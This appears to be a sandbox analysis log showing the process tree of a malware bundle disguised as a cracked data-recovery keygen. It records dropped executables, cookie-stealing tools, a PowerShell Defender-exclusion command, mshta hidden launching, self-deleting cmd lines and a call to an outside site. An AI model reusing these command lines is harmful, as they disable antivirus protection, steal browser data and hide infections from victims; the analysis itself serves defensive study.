"C:\Users\Admin\AppData\Local\Temp\is-4OULE.tmp\5rd3pvvvm00.tmp" /SL5="$A02FC,552809,216064,C:\Users\Admin\AppData\Roaming\kjvtqcmnmme\5rd3pvvvm00.exe" /VERYSILENT /p=testparams
10⤵
PID:6968

C:\Users\Admin\AppData\Local\Temp\elyqtega34x\pmemhosx4vv.exe
"C:\Users\Admin\AppData\Local\Temp\elyqtega34x\pmemhosx4vv.exe" /VERYSILENT
8⤵
PID:2296

C:\Users\Admin\AppData\Local\Temp\RarSFX4\md2_2efs.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX4\md2_2efs.exe"
4⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:4160

C:\Users\Admin\AppData\Local\Temp\RarSFX4\file.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX4\file.exe"
4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4592

C:\Users\Admin\AppData\Roaming\D97A.tmp.exe
"C:\Users\Admin\AppData\Roaming\D97A.tmp.exe"
5⤵
- Suspicious use of SetThreadContext
PID:2896

C:\Users\Admin\AppData\Roaming\D97A.tmp.exe
"C:\Users\Admin\AppData\Roaming\D97A.tmp.exe"
6⤵
PID:2108

C:\Users\Admin\AppData\Roaming\DA85.tmp.exe
"C:\Users\Admin\AppData\Roaming\DA85.tmp.exe"
5⤵
PID:196

C:\Users\Admin\AppData\Roaming\DA85.tmp.exe
"{path}"
6⤵
PID:6400

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX4\file.exe"
5⤵
PID:388

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
6⤵
- Runs ping.exe
PID:5872

C:\Users\Admin\AppData\Local\Temp\RarSFX4\BTRSetp.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX4\BTRSetp.exe"
4⤵
PID:700

C:\ProgramData\8383293.92
"C:\ProgramData\8383293.92"
5⤵
PID:4116

C:\ProgramData\5313006.58
"C:\ProgramData\5313006.58"
5⤵
PID:6824

C:\ProgramData\643491.7
"C:\ProgramData\643491.7"
5⤵
PID:6340

C:\Users\Admin\AppData\Local\Temp\RarSFX4\gcttt.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX4\gcttt.exe"
4⤵
PID:1648

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
5⤵
PID:6336

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
5⤵
PID:8096

C:\Users\Admin\Desktop\Stellar.Phoenix.Data.Recovery.crack.by.orion\Stellar.Phoenix.Data.Recovery.crack.by.orion\Stellar.Phoenix.Data.Recovery.crack.by.orion.exe
"C:\Users\Admin\Desktop\Stellar.Phoenix.Data.Recovery.crack.by.orion\Stellar.Phoenix.Data.Recovery.crack.by.orion\Stellar.Phoenix.Data.Recovery.crack.by.orion.exe"
1⤵
- Executes dropped EXE
PID:3996

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
2⤵
PID:1264

C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
keygen-pr.exe -p83fsase3Ge
3⤵
- Executes dropped EXE
PID:1124

C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe"
4⤵
- Executes dropped EXE
PID:2148

C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe
C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe -txt -scanlocal -file:potato.dat
5⤵
PID:184

C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
keygen-step-1.exe
3⤵
- Executes dropped EXE
PID:2256

C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
keygen-step-3.exe
3⤵
- Executes dropped EXE
PID:2852

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
4⤵
PID:2076

C:\Windows\SysWOW64\PING.EXE
ping 1.1.1.1 -n 1 -w 3000
5⤵
- Runs ping.exe
PID:4088

C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
keygen-step-4.exe
3⤵
- Executes dropped EXE
PID:3544

C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"
4⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies system certificate store
PID:2388

C:\Windows\SysWOW64\msiexec.exe
msiexec.exe /i "C:\Users\Admin\AppData\Local\Temp\gdiview.msi"
5⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4420

C:\Users\Admin\AppData\Local\Temp\AD754B4D3FE2C4EE.exe
C:\Users\Admin\AppData\Local\Temp\AD754B4D3FE2C4EE.exe 0011 installp1
5⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
- Suspicious use of SetThreadContext
- Checks SCSI registry key(s)
PID:4812

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
6⤵
PID:2088

C:\Users\Admin\AppData\Roaming\1615303685562.exe
"C:\Users\Admin\AppData\Roaming\1615303685562.exe" /sjson "C:\Users\Admin\AppData\Roaming\1615303685562.txt"
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4404

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
6⤵
PID:4612

C:\Users\Admin\AppData\Roaming\1615303690109.exe
"C:\Users\Admin\AppData\Roaming\1615303690109.exe" /sjson "C:\Users\Admin\AppData\Roaming\1615303690109.txt"
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4604

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
6⤵
PID:1648

C:\Users\Admin\AppData\Roaming\1615303696450.exe
"C:\Users\Admin\AppData\Roaming\1615303696450.exe" /sjson "C:\Users\Admin\AppData\Roaming\1615303696450.txt"
6⤵
- Suspicious behavior: EnumeratesProcesses
PID:4780

C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe
C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe ThunderFW "C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe"
6⤵
PID:4264

C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe
"C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe" -StartTP
6⤵
PID:7032

C:\Users\Admin\AppData\Local\Temp\AD754B4D3FE2C4EE.exe
C:\Users\Admin\AppData\Local\Temp\AD754B4D3FE2C4EE.exe 200 installp1
5⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
- Checks SCSI registry key(s)
PID:4820

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
6⤵
PID:3692

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
7⤵
- Kills process with taskkill
PID:4120

C:\Windows\SysWOW64\cmd.exe
cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\AD754B4D3FE2C4EE.exe"
6⤵
PID:3236

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 3
7⤵
- Runs ping.exe
PID:1340

C:\Windows\SysWOW64\cmd.exe
cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"
5⤵
PID:4852

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 3
6⤵
- Runs ping.exe
PID:4940

C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe"
4⤵
- Executes dropped EXE
PID:4860

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
5⤵
PID:4976

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
6⤵
- Kills process with taskkill
PID:5052

C:\Users\Admin\AppData\Local\Temp\RarSFX1\Install.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Install.exe"
4⤵
- Executes dropped EXE
PID:4208

C:\Users\Admin\AppData\Local\Temp\HADBYKVRG2\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\HADBYKVRG2\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
5⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:4060

C:\Users\Admin\AppData\Local\Temp\HADBYKVRG2\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\HADBYKVRG2\multitimer.exe" 1 3.1615300310.604786d6b013f 101
6⤵
PID:2680

C:\Users\Admin\AppData\Local\Temp\HADBYKVRG2\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\HADBYKVRG2\multitimer.exe" 2 3.1615300310.604786d6b013f
7⤵
- Checks for any installed AV software in registry
- Maps connected drives based on registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:4768

C:\Users\Admin\AppData\Local\Temp\wbtvwrycwfq\l1ofbjkbazu.exe
"C:\Users\Admin\AppData\Local\Temp\wbtvwrycwfq\l1ofbjkbazu.exe" /ustwo INSTALL
8⤵
PID:984

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "l1ofbjkbazu.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\wbtvwrycwfq\l1ofbjkbazu.exe" & exit
9⤵
PID:6924

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "l1ofbjkbazu.exe" /f
10⤵
- Kills process with taskkill
PID:7216

C:\Users\Admin\AppData\Local\Temp\u1nli0pv11a\askinstall24.exe
"C:\Users\Admin\AppData\Local\Temp\u1nli0pv11a\askinstall24.exe"
8⤵
PID:3224

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
9⤵
PID:4708

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
10⤵
- Kills process with taskkill
PID:4200

C:\Users\Admin\AppData\Local\Temp\4rscd3tpd51\vpn.exe
"C:\Users\Admin\AppData\Local\Temp\4rscd3tpd51\vpn.exe" /silent /subid=482
8⤵
PID:5100

C:\Users\Admin\AppData\Local\Temp\is-80RSQ.tmp\vpn.tmp
"C:\Users\Admin\AppData\Local\Temp\is-80RSQ.tmp\vpn.tmp" /SL5="$203FA,15170975,270336,C:\Users\Admin\AppData\Local\Temp\4rscd3tpd51\vpn.exe" /silent /subid=482
9⤵
PID:5476

C:\Users\Admin\AppData\Local\Temp\a2k4icquawl\app.exe
"C:\Users\Admin\AppData\Local\Temp\a2k4icquawl\app.exe" /8-23
8⤵
PID:5144

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Lingering-Brook"
9⤵
PID:5860

C:\Program Files (x86)\Lingering-Brook\7za.exe
"C:\Program Files (x86)\Lingering-Brook\7za.exe" e -p154.61.71.13 winamp-plugins.7z
9⤵
PID:5960

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Lingering-Brook\app.exe" -map "C:\Program Files (x86)\Lingering-Brook\WinmonProcessMonitor.sys""
9⤵
PID:6092

C:\Program Files (x86)\Lingering-Brook\app.exe
"C:\Program Files (x86)\Lingering-Brook\app.exe" -map "C:\Program Files (x86)\Lingering-Brook\WinmonProcessMonitor.sys"
10⤵
PID:5540

C:\Program Files (x86)\Lingering-Brook\7za.exe
"C:\Program Files (x86)\Lingering-Brook\7za.exe" e -p154.61.71.13 winamp.7z
9⤵
PID:5944

C:\Program Files (x86)\Lingering-Brook\app.exe
"C:\Program Files (x86)\Lingering-Brook\app.exe" /8-23
9⤵
PID:6580

C:\Users\Admin\AppData\Local\Temp\creswnaouyt\IBInstaller_97039.exe
"C:\Users\Admin\AppData\Local\Temp\creswnaouyt\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
8⤵
PID:5516

C:\Users\Admin\AppData\Local\Temp\is-IOFHJ.tmp\IBInstaller_97039.tmp
"C:\Users\Admin\AppData\Local\Temp\is-IOFHJ.tmp\IBInstaller_97039.tmp" /SL5="$20498,14441882,721408,C:\Users\Admin\AppData\Local\Temp\creswnaouyt\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
9⤵
PID:5892

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c start http://gemstrue.shop/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=97039
10⤵
PID:8864

C:\Users\Admin\AppData\Local\Temp\is-DN9AO.tmp\{app}\chrome_proxy.exe
"C:\Users\Admin\AppData\Local\Temp\is-DN9AO.tmp\{app}\chrome_proxy.exe"
10⤵
PID:8908

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-DN9AO.tmp\{app}\chrome_proxy.exe"
11⤵
PID:8796

C:\Windows\SysWOW64\PING.EXE
ping localhost -n 4
12⤵
- Runs ping.exe
PID:6488

C:\Users\Admin\AppData\Local\Temp\4u1k1jlszpz\ljewztvo1h5.exe
"C:\Users\Admin\AppData\Local\Temp\4u1k1jlszpz\ljewztvo1h5.exe" 57a764d042bf8
8⤵
PID:3060

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k "C:\Program Files\F2CIH8Z240\F2CIH8Z24.exe" 57a764d042bf8 & exit
9⤵
PID:6868

C:\Program Files\F2CIH8Z240\F2CIH8Z24.exe
"C:\Program Files\F2CIH8Z240\F2CIH8Z24.exe" 57a764d042bf8
10⤵
PID:5532

C:\Users\Admin\AppData\Local\Temp\gc15sfrshct\vict.exe
"C:\Users\Admin\AppData\Local\Temp\gc15sfrshct\vict.exe" /VERYSILENT /id=535
8⤵
PID:2988

C:\Users\Admin\AppData\Local\Temp\is-FBR3N.tmp\vict.tmp
"C:\Users\Admin\AppData\Local\Temp\is-FBR3N.tmp\vict.tmp" /SL5="$10424,870426,780800,C:\Users\Admin\AppData\Local\Temp\gc15sfrshct\vict.exe" /VERYSILENT /id=535
9⤵
PID:5612

C:\Users\Admin\AppData\Local\Temp\is-DK981.tmp\wimapi.exe
"C:\Users\Admin\AppData\Local\Temp\is-DK981.tmp\wimapi.exe" 535
10⤵
PID:1312

C:\Users\Admin\AppData\Local\Temp\h1f2oisflct\chashepro3.exe
"C:\Users\Admin\AppData\Local\Temp\h1f2oisflct\chashepro3.exe" /VERYSILENT
8⤵
PID:2768

C:\Users\Admin\AppData\Local\Temp\jo0ys2wv3sd\Setup3310.exe
"C:\Users\Admin\AppData\Local\Temp\jo0ys2wv3sd\Setup3310.exe" /Verysilent /subid=577
8⤵
PID:1164

C:\Users\Admin\AppData\Local\Temp\edjwdzgufjs\ew1lfrsdsxv.exe
"C:\Users\Admin\AppData\Local\Temp\edjwdzgufjs\ew1lfrsdsxv.exe" /VERYSILENT
8⤵
PID:2288

C:\Users\Admin\AppData\Local\Temp\is-CF1HT.tmp\ew1lfrsdsxv.tmp
"C:\Users\Admin\AppData\Local\Temp\is-CF1HT.tmp\ew1lfrsdsxv.tmp" /SL5="$10426,870426,780800,C:\Users\Admin\AppData\Local\Temp\edjwdzgufjs\ew1lfrsdsxv.exe" /VERYSILENT
9⤵
PID:5600

C:\Users\Admin\AppData\Local\Temp\is-M7DVT.tmp\winlthst.exe
"C:\Users\Admin\AppData\Local\Temp\is-M7DVT.tmp\winlthst.exe" test1 test1
10⤵
PID:6980

C:\Users\Admin\AppData\Local\Temp\SmrT8fXd2.exe
"C:\Users\Admin\AppData\Local\Temp\SmrT8fXd2.exe"
11⤵
PID:6616

C:\Users\Admin\AppData\Local\Temp\ljf3dkrxcw1\ydbe4lrucxi.exe
"C:\Users\Admin\AppData\Local\Temp\ljf3dkrxcw1\ydbe4lrucxi.exe" testparams
8⤵
PID:1592

C:\Users\Admin\AppData\Roaming\liu1brfsx3j\10r2xzn2cgg.exe
"C:\Users\Admin\AppData\Roaming\liu1brfsx3j\10r2xzn2cgg.exe" /VERYSILENT /p=testparams
9⤵
PID:608

C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe"
4⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:4864

C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"
4⤵
- Executes dropped EXE
PID:4856

C:\Users\Admin\AppData\Roaming\E448.tmp.exe
"C:\Users\Admin\AppData\Roaming\E448.tmp.exe"
5⤵
- Suspicious use of SetThreadContext
PID:3988

C:\Users\Admin\AppData\Roaming\E448.tmp.exe
"C:\Users\Admin\AppData\Roaming\E448.tmp.exe"
6⤵
PID:5036

C:\Users\Admin\AppData\Roaming\E5FE.tmp.exe
"C:\Users\Admin\AppData\Roaming\E5FE.tmp.exe"
5⤵
PID:4648

C:\Users\Admin\AppData\Roaming\E5FE.tmp.exe
"{path}"
6⤵
PID:6656

C:\Users\Admin\AppData\Roaming\E5FE.tmp.exe
"{path}"
6⤵
PID:6684

C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe"
4⤵
PID:4984

C:\ProgramData\549377.5
"C:\ProgramData\549377.5"
5⤵
PID:4376

C:\ProgramData\2491929.27
"C:\ProgramData\2491929.27"
5⤵
PID:4256

C:\ProgramData\Windows Host\Windows Host.exe
"C:\ProgramData\Windows Host\Windows Host.exe"
6⤵
PID:1876

C:\ProgramData\6474090.71
"C:\ProgramData\6474090.71"
5⤵
PID:4128

C:\Users\Admin\AppData\Local\Temp\RarSFX1\gcttt.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\gcttt.exe"
4⤵
- Adds Run key to start application
PID:3000

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
5⤵
PID:60

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
5⤵
PID:5880

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
PID:4488

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 98B8836EF4E9E2D31BD8DB03CE653944 C
2⤵
- Loads dropped DLL
PID:4540

C:\Windows\system32\srtasks.exe
C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
2⤵
PID:6860

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:4284

C:\Users\Admin\AppData\Local\Temp\is-K83JO.tmp\vpn.tmp
"C:\Users\Admin\AppData\Local\Temp\is-K83JO.tmp\vpn.tmp" /SL5="$20400,15170975,270336,C:\Users\Admin\AppData\Local\Temp\mmksqee2yit\vpn.exe" /silent /subid=482
1⤵
PID:5428

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
2⤵
PID:4620

C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
tapinstall.exe remove tap0901
3⤵
PID:7312

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
2⤵
PID:5672

C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
tapinstall.exe install OemVista.inf tap0901
3⤵
PID:7124

C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
2⤵
PID:9140

C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
2⤵
PID:5364

C:\Users\Admin\AppData\Local\Temp\is-2NR4Q.tmp\vict.tmp
"C:\Users\Admin\AppData\Local\Temp\is-2NR4Q.tmp\vict.tmp" /SL5="$203FC,870426,780800,C:\Users\Admin\AppData\Local\Temp\2jhjwmtiw2a\vict.exe" /VERYSILENT /id=535
1⤵
PID:5468

C:\Users\Admin\AppData\Local\Temp\is-UI7EO.tmp\wimapi.exe
"C:\Users\Admin\AppData\Local\Temp\is-UI7EO.tmp\wimapi.exe" 535
2⤵
PID:6988

C:\Users\Admin\AppData\Local\Temp\MvSrIwB4C.exe
"C:\Users\Admin\AppData\Local\Temp\MvSrIwB4C.exe"
3⤵
PID:9296

C:\Users\Admin\AppData\Local\Temp\is-4TQJ5.tmp\pmemhosx4vv.tmp
"C:\Users\Admin\AppData\Local\Temp\is-4TQJ5.tmp\pmemhosx4vv.tmp" /SL5="$10412,870426,780800,C:\Users\Admin\AppData\Local\Temp\elyqtega34x\pmemhosx4vv.exe" /VERYSILENT
1⤵
PID:5452

C:\Users\Admin\AppData\Local\Temp\is-A0GPO.tmp\winlthst.exe
"C:\Users\Admin\AppData\Local\Temp\is-A0GPO.tmp\winlthst.exe" test1 test1
2⤵
PID:6200

C:\Users\Admin\AppData\Local\Temp\Lr8PzoLAG.exe
"C:\Users\Admin\AppData\Local\Temp\Lr8PzoLAG.exe"
3⤵
PID:8884

C:\Users\Admin\AppData\Local\Temp\is-VQ5EM.tmp\chashepro3.tmp
"C:\Users\Admin\AppData\Local\Temp\is-VQ5EM.tmp\chashepro3.tmp" /SL5="$20406,1478410,58368,C:\Users\Admin\AppData\Local\Temp\h1f2oisflct\chashepro3.exe" /VERYSILENT
1⤵
PID:5420

C:\Users\Admin\AppData\Local\Temp\is-K96JT.tmp\Setup3310.tmp
"C:\Users\Admin\AppData\Local\Temp\is-K96JT.tmp\Setup3310.tmp" /SL5="$80234,802346,56832,C:\Users\Admin\AppData\Local\Temp\jo0ys2wv3sd\Setup3310.exe" /Verysilent /subid=577
1⤵
PID:5404

C:\Users\Admin\AppData\Local\Temp\is-J6947.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-J6947.tmp\Setup.exe" /Verysilent
2⤵
PID:5212

C:\Users\Admin\AppData\Local\Temp\is-1DE3O.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-1DE3O.tmp\Setup.tmp" /SL5="$30424,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-J6947.tmp\Setup.exe" /Verysilent
3⤵
PID:5276

C:\Users\Admin\AppData\Local\Temp\is-AH9MD.tmp\PictureLAb.exe
"C:\Users\Admin\AppData\Local\Temp\is-AH9MD.tmp\PictureLAb.exe" /Verysilent
4⤵
PID:7700

C:\Users\Admin\AppData\Local\Temp\is-ELF47.tmp\PictureLAb.tmp
"C:\Users\Admin\AppData\Local\Temp\is-ELF47.tmp\PictureLAb.tmp" /SL5="$107EA,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-AH9MD.tmp\PictureLAb.exe" /Verysilent
5⤵
PID:7740

C:\Users\Admin\AppData\Local\Temp\is-MJD6E.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-MJD6E.tmp\Setup.exe" /VERYSILENT
6⤵
PID:8052

C:\Users\Admin\AppData\Local\Temp\is-FHJTA.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-FHJTA.tmp\Setup.tmp" /SL5="$10894,298255,214528,C:\Users\Admin\AppData\Local\Temp\is-MJD6E.tmp\Setup.exe" /VERYSILENT
7⤵
PID:8148

C:\Users\Admin\AppData\Local\Temp\is-BKHKG.tmp\def.exe
"C:\Users\Admin\AppData\Local\Temp\is-BKHKG.tmp\def.exe" /S /UID=lab214
8⤵
PID:6728

C:\Program Files\Microsoft Office 15\GAMJVJLAUO\prolab.exe
"C:\Program Files\Microsoft Office 15\GAMJVJLAUO\prolab.exe" /VERYSILENT
9⤵
PID:4236

C:\Users\Admin\AppData\Local\Temp\is-AUOG5.tmp\prolab.tmp
"C:\Users\Admin\AppData\Local\Temp\is-AUOG5.tmp\prolab.tmp" /SL5="$40702,575243,216576,C:\Program Files\Microsoft Office 15\GAMJVJLAUO\prolab.exe" /VERYSILENT
10⤵
PID:4300

C:\Users\Admin\AppData\Local\Temp\e7-fc6f8-834-c999c-4595878ec6e96\Lynaqusesha.exe
"C:\Users\Admin\AppData\Local\Temp\e7-fc6f8-834-c999c-4595878ec6e96\Lynaqusesha.exe"
9⤵
PID:5708

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zcmt0xz0.ih4\customer4.exe & exit
10⤵
PID:8196

C:\Users\Admin\AppData\Local\Temp\zcmt0xz0.ih4\customer4.exe
C:\Users\Admin\AppData\Local\Temp\zcmt0xz0.ih4\customer4.exe
11⤵
PID:8916

C:\Users\Admin\AppData\Local\Temp\RarSFX5\main.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX5\main.exe"
12⤵
PID:9152

C:\Windows\regedit.exe
regedit /s chrome.reg
13⤵
- Runs .reg file with regedit
PID:6792

C:\Windows\SYSTEM32\TASKKILL.exe
TASKKILL /F /IM chrome.exe
13⤵
- Kills process with taskkill
PID:7400

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c chrome64.bat
13⤵
PID:4036

C:\Windows\system32\mshta.exe
mshta vbscript:createobject("wscript.shell").run("chrome64.bat h",0)(window.close)
14⤵
PID:8460

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX5\chrome64.bat" h"
15⤵
PID:9096

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe"
16⤵
PID:1640

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x7ffe95606e00,0x7ffe95606e10,0x7ffe95606e20
17⤵
PID:7844

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1656,7871030185744378419,12920897569097467055,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1716 /prefetch:8
17⤵
PID:1720

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1656,7871030185744378419,12920897569097467055,131072 --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1668 /prefetch:2
17⤵
PID:3972

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1656,7871030185744378419,12920897569097467055,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2208 /prefetch:8
17⤵
PID:8660

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1656,7871030185744378419,12920897569097467055,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2972 /prefetch:1
17⤵
PID:7172

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1656,7871030185744378419,12920897569097467055,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2844 /prefetch:1
17⤵
